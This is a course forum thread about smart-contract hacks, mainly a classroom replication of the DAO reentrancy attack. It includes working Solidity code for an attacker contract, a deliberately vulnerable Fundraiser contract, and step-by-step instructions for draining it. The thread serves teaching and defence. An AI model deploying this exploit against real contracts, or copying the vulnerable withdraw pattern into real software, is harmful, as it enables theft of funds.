Hacks Demonstrated and Explained Discussion

Hi @padlanau

As soon as you deploy a contract, all the imported libraries are automatically “pasted” in your main contract.
Because of this, even if the library gets cancelled, it will still be available in your contract that will keep working as usual.
You can verify what I wrote by opening a random contract in the blockchain and read it, you will see that it includes lots of different contracts :slight_smile:

Hope that answered your question.

Cheers,
Dani

Thanks for your reply. Yes, you are correct. I am expecting regardless of language that all dependencies will be “pasted” or put into a package.

I think I did not get it. Ivan was explaining on the video about the $280M Ethereum Parity bug. They can’t withdraw it from the wallet bec someone has accidentally deleted the library. So it means, it did not paste this library after deployment… Am I missing something here?

1 Like

That was an issue with the library itself.
The issue is that the owner of that contract was not initialised.
https://github.com/openethereum/parity-ethereum/issues/6995

Hi everybody, I just watched the latest part about replicating the DAO-Hack, but somehow the startScam function doesn’t work… I tried looking where it goes wrong but I couldn’t find the answer. The error that shows up says "transact to attacker.startScam errored: VM error: revert. revert The transaction has been reverted to the initial state. Note: The called function should be payable if you send value and the value you send should be less than your current balance. Debug the transaction to get more information.
"

I hope someone knows what I did wrong. Looking forward to the answer!!
Below is the code of the Attacker.sol

pragma solidity ^0.4.8;

import "./Fundraiser.sol";

contract attacker{
    
    address public fundraiserAddress;
    uint public drainTimes = 0;
    
    function Attacker(address victimAddress){
        fundraiserAddress = victimAddress;
    }
    
    function() payable{
        if(drainTimes<3){
            drainTimes++;
            Fundraiser(fundraiserAddress).withdraw();
        }
    }
    
    function getFunds() returns (uint){
        return address(this).balance;
    }
    function payMe() payable{
        Fundraiser(fundraiserAddress).contribute.value(msg.value)();
    }
    
    function startScam() {
        Fundraiser(fundraiserAddress).withdraw();
    }
}

Here is the Fundraiser.sol

pragma solidity ^0.4.8;

contract Fundraiser{
    
    mapping(address => uint)Balance;
    
    function contribute() payable{
        Balance[msg.sender] += msg.value;
    }
    
    function withdraw(){
        if(Balance[msg.sender] == 0){
            throw;
        }
        if(msg.sender.call.value(Balance[msg.sender])()){
            Balance[msg.sender] = 0;
        }
        else{
            throw;
        }
    }
        function getFunds() returns (uint){
        return address(this).balance;
    }
}

Hey @Sil

I copied and pasted your contract and they work correctly. Are you following the right steps?

  • Deploy Fundraiser
  • Deploy Attacker
  • Copy the address of Fundraiser and use it as parameter for the function Attacker()
  • Deposit 1 ether from the Attacker contract by using the function payMe()
  • Deposit 5 ether from a random address
  • Call function startScam()

Also if you are using remix, please cast your functions getFunds() as view, it’s much better than click and inspect the result :slight_smile:

Happy coding,
Dani

I think I was following the steps in the wrong order.

Thanks for helping! I appreciate it a lot!!

1 Like

It’s important that you understand deeply what’s happening in this particular hack, if you feel that you did not get it 100%, watch the video multiple times and take some time to think about it.
Better spend some extra time now that lose lots of ether in your further projects :slight_smile:

Happy learning,
Dani

Thanks for the tip. I watched it several times now and it really helped a lot. I also added view to the getFunds header just because it’s easier to see the results (just as you said). I really understand what happened with the DAO-Hack and how to solve the problem.
I’m going to say it again, thanks a lot for helping a rookie!!

1 Like

You are more than welcome :slight_smile:
Happy learning!

Hi @ivan ,

I just noticed that there is an error in the ReEntrency Fix Code you share here: FundraiserFixedBugDAOHackExplanationCode

Shouldn’t we save the balance before reseting it, so we can actually send the value to the user? In the code you shared, in the link and the video, the value we actually send to the user would be 0. No?
ReEntrencyIvanBug

Hello, I have a question to understand better the DAO hack.
Why the fundraiser will send money to the attacker?
Wasn’t the fundraiser able to see on the blockchain that the contract of the attacker is malicious?

Hi @bigbill

Why the fundraiser will send money to the attacker?
Wasn’t the fundraiser able to see on the blockchain that the contract of the attacker is malicious?

fundraiser would allow any user to withdraw ether if the had deposited some.

A contract does not know if another contract is malicious, also a contract does not know if the address that is calling a function is a user or another contract.

These things are explained in the video, also it’s explained why the fundraiser kept sending ether to the hack contract, watch it once again and let me know if you have questions!

Happy learning,
Dani

Hello everyone,
I’ve found some job ads where the Customer is in need for a review on his code for preventing RugPulls

Is there some useful content that may help me understand how to address this ?

Is this a fancy question to think you could solve rug-pulls through code only ?

https://decrypt.co/55787/defi-rug-pulls-were-cryptos-top-fraud-scheme-in-2020-ciphertrace